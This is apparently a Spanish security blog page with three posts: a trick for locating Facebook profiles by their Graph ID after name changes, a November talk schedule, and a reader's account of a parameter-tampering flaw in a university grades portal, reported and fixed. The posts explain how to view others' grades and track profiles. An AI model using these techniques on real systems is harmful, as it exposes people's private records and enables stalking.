Si quisiera modificar esa información, solo debería ir a settings y elegir nuevos valores para esos campos. Solo en el caso de la URL tendría problemas de elección, ya que si está ocupada no se puede elegir - evidentemente -.

Figura 3: Opciones de cambiar la URL de la dirección y el nombre de la cuenta

Lo que realmente marca la ubicación de una página o perfil en Facebook es su ID, por lo que basta con buscarlo y guardarlo para siempre poder encontrar la página o el perfil, aunque se hayan cambiado los datos de nombre y/o la dirección URL de la misma. Estos datos se pueden obtener directamente desde Graph, por lo que con cambiar www por graph en Facebook aparecerá el ID de la cuenta, ese es el de la mía.

Figura 4: ID de la cuenta en Facebook

A partir de ese momento, se cambien los datos o no, si alguien quiere llegar a la página Facebook asociada a ese ID, no importa si se ha cambiado el nombre o la URL, basta con poner el ID en la barra de direcciones y listo.

Figura 5: Localización de la página por medio del ID

Como os podéis imaginar, eso solo vale cuando se ha guardado ese dato, así que si estás teniendo problemas con una cuenta en Facebook que vas a denunciar, además de tomar evidencias digitales para la denuncia de la web, haz lo mismo pero con la URL de Graph, lo que ayudará a poder tener localizado siempre al perfil. Ya sabes, guarda el ID de tus amigos ... y el de los no tanto para nunca perderlos de vista.

Saludos Malignos!

Durante el mes de Noviembre voy a dar unas cuantas charlas. Algunas son privadas así que no os las pongo por aquí, pero hay un par de ellas a las que puedes asistir en Madrid y en México D.F. por si os viene bien y os apetece estar.

Figura 1: Eventos en los que participaré en Noviembre

La primera de ellas será en el MovilForum 2014 en México D.F. donde estaré el día 13 de Noviembre a las 09:00 de la mañana dando una charla. Este es un evento al que puede apuntarse todo el mundo, y en el que irán muchos otros ponentes del mundo de los negocios y la empresa.

Figura 2: Movilforum 2014 en México

Yo hablaré de seguridad, de Eleven Paths, y de alguna cosa más que se me ocurra durante el viaje nocturno que me llevará allí. Tenéis más información del evento en su web: MovilForum 2014 México.

Figura 3: Codemotion 2014 en Madrid

El otro de los eventos al que puedes apuntarte es Codemotion 2014. Se hace otra vez en Madrid, y yo estaré el viernes 21 de Noviembre dando una conferencia de una hora. El año pasado estuve ya hablando de SQL Injection que tenéis en mi canal Youtube, pero el número de conferencias que aloja este evento es muy alto. Sobre el evento del año pasado han hecho un pequeño trailer que podéis ver en este vídeo.

Figura 3: Trailer de lo que fue Codemotion 2013

Además de estos eventos, yo estaré en mi colaboración semanal en La Mañana con Javi Nieves, en mi sección de los martes entre 10:00 y 12:00. Como sabéis son unos minutos que van cambiando. Este martes que viene, seguro que será antes de las 11:00 porque luego tengo ya jaleo. El resumen de mis eventos en Noviembre - por ahora - es el siguiente:

- 11 de Noviembre: La Mañana con Javi Nieves [Radio]
- 13 de Noviembre: MovilForum 2014 [México D.F.]
- 18 de Noviembre: La Mañana con Javi Nieves [Radio]
- 21 de Noviembre: Codemotion 2014 [Madrid]
- 25 de Noviembre: La Mañana con Javi Nieves [Radio]

Saludos Malignos!

Soy un estudiante en la universidad, y tras haber realizado los exámenes de una de las convocatorias una tarde me conecté al portal del estudiante para consultar mis poco agraciadas notas. En esta historia, la curiosidad por la seguridad me llevó a, jugando con un parámetro, poder consultar no solo mis notas sino la de todos los estudiantes de la universidad, y esta es la historia que os vengo a contar.

Figura 1: Cómo cotillear las notas de todos los compañeros de la Universidad por un bug

Como ya sucede en muchos centros educativos, la única manera de hacerlo era a través de una aplicación web dedicada a estudiantes que estaba escrita en lenguaje PHP. En ella, tras iniciar sesión en la Intranet de la universidad con tu cuenta de estudiante se pueden consultar el expediente con todas las notas. En esta captura, acceder al expediente se hace a través de la opción “Veure expedient”.

Figura 2: Intranet de la universidad para ver las notas

Estando en ese punto, y habiendo leído tanto y tanto sobre seguridad en aplicaciones web en blogs como El lado del Mal, decidí mirar cómo estaba construyéndose la petición de generación del expediente. Son muchas veces las que se han hablado de las estafas de cambiar notas en la universidad, y quería ver si alguien con tiempo y conocimientos podría hacer esto.

Al analizar el código, pude ver que se estaba utilizando un parámetro, llamado NIA, para solicitar la generación del expediente de notas. Ese parámetros NIA es el Numero de Identificación del Alumno, y es que se utiliza para acceder a la base de datos y filtrar las notas y asignaturas cursadas por cada uno de los expedientes.

Figura 3: Parametro NIA que identifica al estudiante de la universidad

Como prueba, decidí que habría que probar a ver si cambiando el valor del NIA se podría acceder a información que no fuera de mi expediente. Es decir, si en lugar de utilizar el valor de NIA con información de mi sesión en el lado del servidor se estaba utilizando el valor que estaba siendo enviado desde el cliente. Este es un fallo de seguridad muy típico que se ha visto en muchas tiendas online para cambiar precios o en sistemas de información para ver datos no asociados a nuestra cuenta.

Figura 4: Sustitución del valor NIA en todos los valores del formulario donde aparecía el míio

Como se puede ver, cambiando el valor con cualquier herramienta para desarrolladores web - yo utilicé Firebug - se puede probar si el servidor hace bien las cosas o estamos ante un fallo de manipulación de parámetros. En este caso elegí un valor al azar y comprobé que podía ver sus notas completas.

Figura 5: Acceso a un expediente de otra persona con manipulación de parámetros

Hay que decir que para poder hacer esto es necesario tener una sesión de alumno, y es cierto que los NIA no son públicos, pero se podría haber hecho un programa que recorriera todo el rango y descargara las notas de todos los estudiantes.

Reflexión final

Por supuesto, me puse en contacto con los responsables de este sistema en la universidad y ellos lo arreglaron con la celeridad y cuidado necesario, así que esto ya no funciona. No obstante, está claro que nuestros datos están en sistemas que a veces no están lo suficientemente securizados y puede ser que alguien acabe accediendo a ellos por un fallo de lo más inesperado que pudiera ser explotado por cualquiera sin grandes conocimientos técnicos lo que deja claro que hay que invertir más en seguridad y en herramientas de protección para evitar al máximo estos problemas.

Autor: Gerard Sánchez

La RAE vilipendia a los hackers. Petición en Change.org para que la RAE cambie la definición de hacker.

Testimonio de una estafada por contratar falsos "hackers for hire"

WordPress: SQL Injection Bug en Scarcity Builder Plugin

Dos casos reales de robo de dinero con suplantación de identidad de ayer mismo

Doxing y las zonas de seguridad de Microsoft Outlook

¿Cuántas copias históricas se pueden obtener de un documento publicado en Internet?

Facebook y el extraño caso poder de ver las fotos de personas que no son tus amigas

Descargar ejecutables de Deep Web puede ser peligroso

Cómo robar las BBDD de la empresa atacando al jefe

Ataques a GNU/Linux con alias maliciosos de su y sudo

¿A quién le vas a decir la fecha de tu muerte?

"Apocalipse" en Drupal 7: Hackeados por un Bug de SQL Injection en función de seguridad contra SQL Injection

Cómo funciona el software de espionaje de Hacking Team

Runtastic: Otra red social de personsas que publican su ubicación y estado de salud

Security Innovation Day 2014: Keynote en Vídeo

Configurar Latch en OpenWRT sobre una Raspberry Pi

Saber la versión PHP de un servidor web por los huevos de pascua

Cómo localizar en Facebook a alguien que se ha cambiado el nombre o la dirección

Noviembre: Movilforum en México y Codemotion Madrid

Cómo cotillear las notas de todos los compañeros de la Universidad por un bug en la web de expedientes